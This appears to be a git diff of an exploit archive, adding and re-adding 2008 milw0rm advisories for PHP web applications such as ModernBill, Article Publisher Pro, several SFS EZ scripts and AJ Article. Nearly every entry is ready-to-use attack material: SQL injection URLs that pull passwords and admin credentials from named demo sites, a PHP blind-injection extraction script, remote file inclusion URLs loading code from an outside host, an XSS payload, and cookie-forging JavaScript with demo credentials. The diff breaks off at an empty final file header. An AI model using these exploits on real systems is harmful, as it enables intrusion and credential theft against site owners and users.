-http://poop.com/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+
-
-**************************************************************************************
-
-# milw0rm.com [2008-10-31]
+**************************************************************************************
+ModernBill .:. Client Billing System - User Login
+ModernBill <= v4.4.X Remote File Inclusion Vulnerability and xss by nigh7f411
+http://xc0r3.net/
+plezz go to ttp://xc0r3.net/forums/
+**************************************************************************************
+
+rfi
+http://poop.com/include/scripts/export_batch.inc.php?DIR=http://xc0r3.net/x2300.txt?
+http://poop.com/include/scripts/run_auto_suspend.cron.php?DIR=http://xc0r3.net/x2300.txt?
+http://poop.com/include/scripts/send_email_cache.php?DIR=http://xc0r3.net/x2300.txt?
+http://poop.com/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=http://xc0r3.net/x2300.txt?
+http://poop.com/include/html/nettools.popup.php?DIR=http://xc0r3.net/x2300.txt?
+
+xss
+http://poop.com/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+
+
+**************************************************************************************
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6917.php b/platforms/php/webapps/6917.php
index a4b4e8427..9f00f33ed 100755
--- a/platforms/php/webapps/6917.php
+++ b/platforms/php/webapps/6917.php
@@ -1,87 +1,87 @@ -########################################################################### -# Kira has decide be back after halloween -########################################################################### -# Discovered by : Mountassif Moad -# Type Gap : Blind Sql Injection -# Script : Article Publisher Pro : http://www.phparticlescript.com/ -# Greetz : Allah , All my freind -########################################################################## - -P0c : - -http://localhost/contact_author.php?userid=1+and+1=1 true - -http://localhost/contact_author.php?userid=1+and+1=0 false - -http://demo-article-publisher-pro.phparticlescript.com/contact_author.php?userid=1+and+1=1 true - -http://demo-article-publisher-pro.phparticlescript.com/contact_author.php?userid=1+and+1=0 false - -Exploit : - -http://localhost/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=4 true - -http://localhost/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=5 false - -Demo Test : - -http://fashiongumbo.com/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=4 true - -http://fashiongumbo.com/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=5 false - -code Exploit : - -php '.$argv[0].' 
http://localhost/contact_author.php?userid=1 user() -# -############################################################### -'); -if ($argc > 1) { -$url = $argv[1]; -$r = strlen(file_get_contents($url."+and+1=1")); -echo "\nExploiting:\n"; -$w = strlen(file_get_contents($url."'+and+1=0")); -$t = abs((100-($w/$r*100))); -echo "\n".$argv[2].": "; -for ($i=1; $i <= 30; $i++) { -$laenge = strlen(file_get_contents($url."+and+ascii(substring((".$argv[2]."),".$i.",1))!=0")); - if (abs((100-($laenge/$r*100))) > $t-1) { - $count = $i; - $i = 30; - } -} -for ($j = 1; $j < $count; $j++) { - for ($i = 46; $i <= 122; $i=$i+2) { - if ($i == 60) { - $i = 98; - } - $laenge = strlen(file_get_contents($url."+and+ascii(substring((".$argv[2]."),".$j.",1))%3E".$i."")); - if (abs((100-($laenge/$r*100))) > $t-1) { - $laenge = strlen(file_get_contents($url."+and+ascii(substring((".$argv[2]."),".$j.",1))%3E".($i-1)."")); - if (abs((100-($laenge/$r*100))) > $t-1) { - echo chr($i-1); - } else { - echo chr($i); - } - $i = 122; - } - } -} - -} else { -echo "\nExploiting failed: ar u sur your link have a real id user \n"; -} -?> - -# milw0rm.com [2008-10-31] +########################################################################### +# Kira has decide be back after halloween +########################################################################### +# Discovered by : Mountassif Moad +# Type Gap : Blind Sql Injection +# Script : Article Publisher Pro : http://www.phparticlescript.com/ +# Greetz : Allah , All my freind +########################################################################## + +P0c : + +http://localhost/contact_author.php?userid=1+and+1=1 true + +http://localhost/contact_author.php?userid=1+and+1=0 false + +http://demo-article-publisher-pro.phparticlescript.com/contact_author.php?userid=1+and+1=1 true + +http://demo-article-publisher-pro.phparticlescript.com/contact_author.php?userid=1+and+1=0 false + +Exploit : + 
+http://localhost/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=4 true + +http://localhost/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=5 false + +Demo Test : + +http://fashiongumbo.com/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=4 true + +http://fashiongumbo.com/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=5 false + +code Exploit : + +php '.$argv[0].' http://localhost/contact_author.php?userid=1 user() +# +############################################################### +'); +if ($argc > 1) { +$url = $argv[1]; +$r = strlen(file_get_contents($url."+and+1=1")); +echo "\nExploiting:\n"; +$w = strlen(file_get_contents($url."'+and+1=0")); +$t = abs((100-($w/$r*100))); +echo "\n".$argv[2].": "; +for ($i=1; $i <= 30; $i++) { +$laenge = strlen(file_get_contents($url."+and+ascii(substring((".$argv[2]."),".$i.",1))!=0")); + if (abs((100-($laenge/$r*100))) > $t-1) { + $count = $i; + $i = 30; + } +} +for ($j = 1; $j < $count; $j++) { + for ($i = 46; $i <= 122; $i=$i+2) { + if ($i == 60) { + $i = 98; + } + $laenge = strlen(file_get_contents($url."+and+ascii(substring((".$argv[2]."),".$j.",1))%3E".$i."")); + if (abs((100-($laenge/$r*100))) > $t-1) { + $laenge = strlen(file_get_contents($url."+and+ascii(substring((".$argv[2]."),".$j.",1))%3E".($i-1)."")); + if (abs((100-($laenge/$r*100))) > $t-1) { + echo chr($i-1); + } else { + echo chr($i); + } + $i = 122; + } + } +} + +} else { +echo "\nExploiting failed: ar u sur your link have a real id user \n"; +} +?> + +# milw0rm.com [2008-10-31] diff --git a/platforms/php/webapps/6918.txt b/platforms/php/webapps/6918.txt index 75b71ee41..a6bf82ea1 100755 --- a/platforms/php/webapps/6918.txt +++ b/platforms/php/webapps/6918.txt 
@@ -1,34 +1,34 @@
-###########################################################################
-# Kira has decide be back after halloween
-###########################################################################
-# Discovered by : Mountassif Moad
-# Type Gap : Blind Sql Injection
-# Script : SFS EZ Auction Remote Blind sql injection
-# Home Script : http://www.scripts-for-sites.info/item.php?item=97
-# Greetz : Allah , All my freind
-##########################################################################
-
-
-P0c :
-
-http://localhost/viewfaqs.php?cat=1+and+1=1 true
-
-http://localhost/viewfaqs.php?cat=1+and+1=1 false
-
-http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1 true
-
-http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1 false
-
-Exploit :
-
-http://localhost/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=5
-
-http://localhost/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=4
-
-Demo :
-
-http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=5
-
-http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=4
-
-# milw0rm.com [2008-10-31]
+###########################################################################
+# Kira has decide be back after halloween
+###########################################################################
+# Discovered by : Mountassif Moad
+# Type Gap : Blind Sql Injection
+# Script : SFS EZ Auction Remote Blind sql injection
+# Home Script : http://www.scripts-for-sites.info/item.php?item=97
+# Greetz : Allah , All my freind
+##########################################################################
+
+
+P0c :
+
+http://localhost/viewfaqs.php?cat=1+and+1=1 true
+
+http://localhost/viewfaqs.php?cat=1+and+1=1 false
+
+http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1 true
+
+http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1 false
+
+Exploit :
+
+http://localhost/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=5
+
+http://localhost/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=4
+
+Demo :
+
+http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=5
+
+http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=4
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6919.txt b/platforms/php/webapps/6919.txt
index 795c4840c..1918cb2e1 100755
--- a/platforms/php/webapps/6919.txt
+++ b/platforms/php/webapps/6919.txt
@@ -1,26 +1,26 @@
-###########################################################################
-# Kira has decide be back after halloween
-###########################################################################
-# Discovered by : Mountassif Moad
-# Type Gap : Sql execution
-# Script : SFS EZ Career Remote sql execution
-# Home Script : http://www.scripts-for-sites.info/item.php?item=92
-# Greetz : Allah , All my freind
-##########################################################################
-
-
-Exploit :
-
-http://localhost/[career]/content.php?topic=user()
-http://localhost/[career]/content.php?topic=version()
-http://localhost/[career]/content.php?topic=database()
-http://localhost/[career]/content.php?topic=id
-
-
-Demo :
-http://www.turnkeyzone.com/demos/career/content.php?topic=id
-http://www.turnkeyzone.com/demos/career/content.php?topic=version()
-http://www.turnkeyzone.com/demos/career/content.php?topic=user()
-http://www.turnkeyzone.com/demos/career/content.php?topic=database()
-
-# milw0rm.com [2008-10-31]
+###########################################################################
+# Kira has decide be back after halloween
+###########################################################################
+# Discovered by : Mountassif Moad
+# Type Gap : Sql execution
+# Script : SFS EZ Career Remote sql execution
+# Home Script : http://www.scripts-for-sites.info/item.php?item=92
+# Greetz : Allah , All my freind
+##########################################################################
+
+
+Exploit :
+
+http://localhost/[career]/content.php?topic=user()
+http://localhost/[career]/content.php?topic=version()
+http://localhost/[career]/content.php?topic=database()
+http://localhost/[career]/content.php?topic=id
+
+
+Demo :
+http://www.turnkeyzone.com/demos/career/content.php?topic=id
+http://www.turnkeyzone.com/demos/career/content.php?topic=version()
+http://www.turnkeyzone.com/demos/career/content.php?topic=user()
+http://www.turnkeyzone.com/demos/career/content.php?topic=database()
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6920.txt b/platforms/php/webapps/6920.txt
index 9e2b607f7..cd3583c79 100755
--- a/platforms/php/webapps/6920.txt
+++ b/platforms/php/webapps/6920.txt
@@ -1,18 +1,18 @@
-###########################################################################
-# Kira has decide be back after halloween
-###########################################################################
-# Discovered by : Mountassif Moad
-# Type Gap : Sql injection
-# Script : SFS EZ Top Sites Remote sql Injection
-# Home Script : http://www.scripts-for-sites.info/item.php?item=112
-# Greetz : Allah , All my freind
-##########################################################################
-
-http://localhost/topsites/topsite.php?ts=-1/**/UNION/**/SELECT/**/1,password,3,4,5+from+users/*
-
-Demo :
-
-http://turnkeyzone.com/demos/topsites/topsite.php?ts=-1/**/UNION/**/SELECT/**/1,password,3,4,5+from+users/*
-http://turnkeyzone.com/demos/topsites/topsite.php?ts=-169%20union%20select%201,2,3,4,5/*
-
-# milw0rm.com [2008-10-31]
+###########################################################################
+# Kira has decide be back after halloween
+###########################################################################
+# Discovered by : Mountassif Moad
+# Type Gap : Sql injection
+# Script : SFS EZ Top Sites Remote sql Injection
+# Home Script : http://www.scripts-for-sites.info/item.php?item=112
+# Greetz : Allah , All my freind
+##########################################################################
+
+http://localhost/topsites/topsite.php?ts=-1/**/UNION/**/SELECT/**/1,password,3,4,5+from+users/*
+
+Demo :
+
+http://turnkeyzone.com/demos/topsites/topsite.php?ts=-1/**/UNION/**/SELECT/**/1,password,3,4,5+from+users/*
+http://turnkeyzone.com/demos/topsites/topsite.php?ts=-169%20union%20select%201,2,3,4,5/*
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6922.txt b/platforms/php/webapps/6922.txt
index f3f3b11cc..dcd938e58 100755
--- a/platforms/php/webapps/6922.txt
+++ b/platforms/php/webapps/6922.txt
@@ -1,39 +1,39 @@ -[~] SFS EZ WEBSTORE remote sql inj -[~] -[~] SearchResults.php (where) -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 01.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] N0T: a.q kpss : ) ) -[~] -[~] ----------------------------------------------------------- - -Exploit: - -http://localhost/script_path/SearchResults.php?SearchTerm=ZoRLu&where=[SQL] - -[SQL]= - -ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/* - -demo - -http://turnkeyzone.com/demos/store/SearchResults.php?SearchTerm=ZoRLu&where=ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/* - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-01] +[~] SFS EZ WEBSTORE remote sql inj +[~] +[~] SearchResults.php (where) +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 01.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] N0T: a.q kpss : ) ) +[~] +[~] ----------------------------------------------------------- + +Exploit: + +http://localhost/script_path/SearchResults.php?SearchTerm=ZoRLu&where=[SQL] + +[SQL]= + +ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/* + +demo + 
+http://turnkeyzone.com/demos/store/SearchResults.php?SearchTerm=ZoRLu&where=ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/* + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim HaCkeRs +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6923.txt b/platforms/php/webapps/6923.txt index 90fd4325a..e3c6bb221 100755 --- a/platforms/php/webapps/6923.txt +++ b/platforms/php/webapps/6923.txt 
@@ -1,26 +1,26 @@ -########################################################################### - ______ __ __ ______ __ ______ - / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ - / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ - / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / - /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ - /____/ - -# Discovered by : Hakxer -# Type Gap : SQL Injection -# Script : SFS EZ Pub Site -# Greetz : Allah , Egyptian x hacker , Str0ke :) -########################################################################## - -# [~] Poc : -http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14/* -# [~] Exploit : -http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,database(),9,10,11,12,13,14/* -OR -http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14/* - - -# Proud To be a Muslim # -#_=END=_# - -# milw0rm.com [2008-11-01] +########################################################################### + ______ __ __ ______ __ ______ + / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ + / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ + / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / + /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ + /____/ + +# Discovered by : Hakxer +# Type Gap : SQL Injection +# Script : SFS EZ Pub Site +# Greetz : Allah , Egyptian x hacker , Str0ke :) +########################################################################## + +# [~] Poc : +http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14/* +# [~] Exploit : 
+http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,database(),9,10,11,12,13,14/* +OR +http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14/* + + +# Proud To be a Muslim # +#_=END=_# + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6924.txt b/platforms/php/webapps/6924.txt index 217fb5647..9ff9176a3 100755 --- a/platforms/php/webapps/6924.txt +++ b/platforms/php/webapps/6924.txt 
@@ -1,37 +1,37 @@ -[~] SFS EZ Gaming Cheats remote sql inj -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 01.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] N0T: a.q kpss : ) ) -[~] -[~] ----------------------------------------------------------- - -Exploit: - -http://localhost/script_path/view_reviews.php?id=[SQL] - -[SQL]= - --999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9-- - -demo - -http://turnkeyzone.com/demos/cheats/view_reviews.php?id=-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9-- - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-01] +[~] SFS EZ Gaming Cheats remote sql inj +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 01.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] N0T: a.q kpss : ) ) +[~] +[~] ----------------------------------------------------------- + +Exploit: + +http://localhost/script_path/view_reviews.php?id=[SQL] + +[SQL]= + +-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9-- + +demo + +http://turnkeyzone.com/demos/cheats/view_reviews.php?id=-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9-- + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim HaCkeRs +[~] +[~] yildirimordulari.org & darkc0de.com +[~] 
+[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6925.txt b/platforms/php/webapps/6925.txt index 7b4167d1c..f7d6647b0 100755 --- a/platforms/php/webapps/6925.txt +++ b/platforms/php/webapps/6925.txt 
@@ -1,26 +1,26 @@ -# Bloggie Lite 0.0.2 Beta SQl Injection by Insecure Cookie Handling -# url: http://mywebland.com/download.php?id=20 -# -# Author: JosS -# mail: sys-project[at]hotmail[dot]com -# site: http://spanish-hackers.com -# team: Spanish Hackers Team - [SHT] -# -# This was written for educational purpose. Use it at your own risk. -# Author will be not responsible for any damage. - -vuln file: /genscode.php -vuln code: -39: $user_ip = $_SERVER['REMOTE_ADDR']; - define('COMMENT_COOKIE', md5($user_ip)); - if(isset($_COOKIE[COMMENT_COOKIE])) { -xx: ... - $comment_cookie = $_COOKIE[COMMENT_COOKIE]; -55: $sql = "SELECT * FROM ".SCODE_TBL." WHERE cookie = '".$comment_cookie."'"; - -exploit: -javascript:document.cookie = "f528764d624db129b32c21fbca0cb8d6=127.0.0.1'+union+all+select+user(),user(),user()/*; path=/"; - -Hack0wn :D - -# milw0rm.com [2008-11-01] +# Bloggie Lite 0.0.2 Beta SQl Injection by Insecure Cookie Handling +# url: http://mywebland.com/download.php?id=20 +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. + +vuln file: /genscode.php +vuln code: +39: $user_ip = $_SERVER['REMOTE_ADDR']; + define('COMMENT_COOKIE', md5($user_ip)); + if(isset($_COOKIE[COMMENT_COOKIE])) { +xx: ... + $comment_cookie = $_COOKIE[COMMENT_COOKIE]; +55: $sql = "SELECT * FROM ".SCODE_TBL." WHERE cookie = '".$comment_cookie."'"; + +exploit: +javascript:document.cookie = "f528764d624db129b32c21fbca0cb8d6=127.0.0.1'+union+all+select+user(),user(),user()/*; path=/"; + +Hack0wn :D + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6927.txt b/platforms/php/webapps/6927.txt index 4dee8b0a7..c59e75b67 100755 --- a/platforms/php/webapps/6927.txt +++ b/platforms/php/webapps/6927.txt 
@@ -1,44 +1,44 @@ -############################################################### -#################### Viva IslaM Viva IslaM #################### -## -## Remote SQL injection Vulnerability -## -## AJ ARTICLE ( featured_article.php mode ) -## -############################################################### -############################################################### -## -## AuTh0r : Mr.SQL -## -## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f -## -## Email : SQL@Hotmail.it -## -## SYRiAN Arab HACkErS -######################## -######################## -## -## Name : AJ ARTICLE -## -## Site : www.ajsquare.com -## -######################## -######################## -## -## -(:: L!VE DEMO ::)- -## -## http://www.ajsquare.com/products/demo/featured_article.php?mode=detail&page=&artid=-109+union+select+0,0,0,0,concat_ws(0x3a,username,admin_password),0,0,0,0,0,0,0+from+admin-- -## -######################## -######################## - - -####################################################################################################### -####################################################################################################### - -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- - - :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS :: -####################################################################################################### -####################################################################################################### - -# milw0rm.com [2008-11-01] +############################################################### +#################### Viva IslaM Viva IslaM #################### +## +## Remote SQL injection Vulnerability +## +## AJ ARTICLE ( featured_article.php mode ) +## +############################################################### +############################################################### +## +## AuTh0r : Mr.SQL +## +## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f +## +## Email : SQL@Hotmail.it +## +## SYRiAN Arab HACkErS +######################## +######################## +## +## Name : AJ ARTICLE +## +## Site : www.ajsquare.com +## +######################## +######################## +## +## -(:: L!VE DEMO ::)- +## +## http://www.ajsquare.com/products/demo/featured_article.php?mode=detail&page=&artid=-109+union+select+0,0,0,0,concat_ws(0x3a,username,admin_password),0,0,0,0,0,0,0+from+admin-- +## +######################## +######################## + + +####################################################################################################### +####################################################################################################### + -(:: !Gr3E3E3E3E3E3E3TzZ! ::)- + + :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS :: +####################################################################################################### +####################################################################################################### + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6928.txt b/platforms/php/webapps/6928.txt index 215738840..aa91552c5 100755 
--- a/platforms/php/webapps/6928.txt +++ b/platforms/php/webapps/6928.txt 
@@ -1,41 +1,41 @@ -================================================================================================================== - - - [o] Flash Tree Gallery 1.0 Remote File Inclusion Vulnerability - - Software : com_treeg version 1.0 - Vendor : http://justjoomla.net/ - Author : NoGe - Contact : noge[dot]code[at]gmail[dot]com - - -================================================================================================================== - - - [o] Vulnerable file - - administrator/components/com_treeg/admin.treeg.php - - include( "$mosConfig_live_site/components/com_treeg/about.html" ); - - - - [o] Exploit - - http://localhost/[path]/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=[evilcode] - - -================================================================================================================== - - - [o] Greetz - - MainHack BrotherHood [ www.mainhack.com - http://serverisdown.org/blog/] - VOP Crew [ Vrs-hCk OoN_BoY Paman ] - H312Y yooogy mousekill }^-^{ kaka11 martfella - skulmatic olibekas ulga Cungkee k1tk4t str0ke - - -================================================================================================================== - -# milw0rm.com [2008-11-01] +================================================================================================================== + + + [o] Flash Tree Gallery 1.0 Remote File Inclusion Vulnerability + + Software : com_treeg version 1.0 + Vendor : http://justjoomla.net/ + Author : NoGe + Contact : noge[dot]code[at]gmail[dot]com + + +================================================================================================================== + + + [o] Vulnerable file + + administrator/components/com_treeg/admin.treeg.php + + include( "$mosConfig_live_site/components/com_treeg/about.html" ); + + + + [o] Exploit + + http://localhost/[path]/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=[evilcode] + + 
+================================================================================================================== + + + [o] Greetz + + MainHack BrotherHood [ www.mainhack.com - http://serverisdown.org/blog/] + VOP Crew [ Vrs-hCk OoN_BoY Paman ] + H312Y yooogy mousekill }^-^{ kaka11 martfella + skulmatic olibekas ulga Cungkee k1tk4t str0ke + + +================================================================================================================== + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6929.txt b/platforms/php/webapps/6929.txt index 5b896b7a9..cf2fddef0 100755 --- a/platforms/php/webapps/6929.txt +++ b/platforms/php/webapps/6929.txt 
@@ -1,88 +1,88 @@ -[~] Article Publisher PRO Insecure Cookie Handling Vulnerability -[~] -[~] version: 1.5 -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 01.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] N0T: a.q kpss : ) ) -[~] -[~] ---------------------------------------------------------- - -demo admin login: - -http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php - -demo user login: - -http://demo-article-publisher-pro.phparticlescript.com/login.php - - -admin_name: admin - -passwd: demo - -passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229 - -user_id: 1 - -or - -user_name: zorlu - -passwd: zorlu - -passwd_md5: 2178fb3ee4a88f946ecb68734b266c10 - -user_id: 6 - -or - -user_name: demo - -passwd: demo - -passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229 - -user_id: 2 - - -exploit: - -admin: - -javascript:document.cookie = "xadmin=user_id%2Cpasswd_md5; path=/"; - -user: - -javascript:document.cookie = "user=user_id%2Cpasswd_md5; path=/"; - -for demo admin: ( user_id: 1) - -javascript:document.cookie = "xadmin=1%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/"; - -for demo user: ( for user zorlu user_id: 6 ) - -javascript:document.cookie = "user=6%2C2178fb3ee4a88f946ecb68734b266c10; path=/"; - -for demo user: ( for user demo user_id: 2 ) - -javascript:document.cookie = "user=2%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/"; - - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-01] +[~] Article Publisher PRO Insecure Cookie Handling Vulnerability +[~] +[~] version: 1.5 +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 
01.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] N0T: a.q kpss : ) ) +[~] +[~] ---------------------------------------------------------- + +demo admin login: + +http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php + +demo user login: + +http://demo-article-publisher-pro.phparticlescript.com/login.php + + +admin_name: admin + +passwd: demo + +passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229 + +user_id: 1 + +or + +user_name: zorlu + +passwd: zorlu + +passwd_md5: 2178fb3ee4a88f946ecb68734b266c10 + +user_id: 6 + +or + +user_name: demo + +passwd: demo + +passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229 + +user_id: 2 + + +exploit: + +admin: + +javascript:document.cookie = "xadmin=user_id%2Cpasswd_md5; path=/"; + +user: + +javascript:document.cookie = "user=user_id%2Cpasswd_md5; path=/"; + +for demo admin: ( user_id: 1) + +javascript:document.cookie = "xadmin=1%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/"; + +for demo user: ( for user zorlu user_id: 6 ) + +javascript:document.cookie = "user=6%2C2178fb3ee4a88f946ecb68734b266c10; path=/"; + +for demo user: ( for user demo user_id: 2 ) + +javascript:document.cookie = "user=2%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/"; + + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim HaCkeRs +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6930.txt b/platforms/php/webapps/6930.txt index 90d34c45c..6d7bdd5df 100755 --- a/platforms/php/webapps/6930.txt +++ b/platforms/php/webapps/6930.txt 
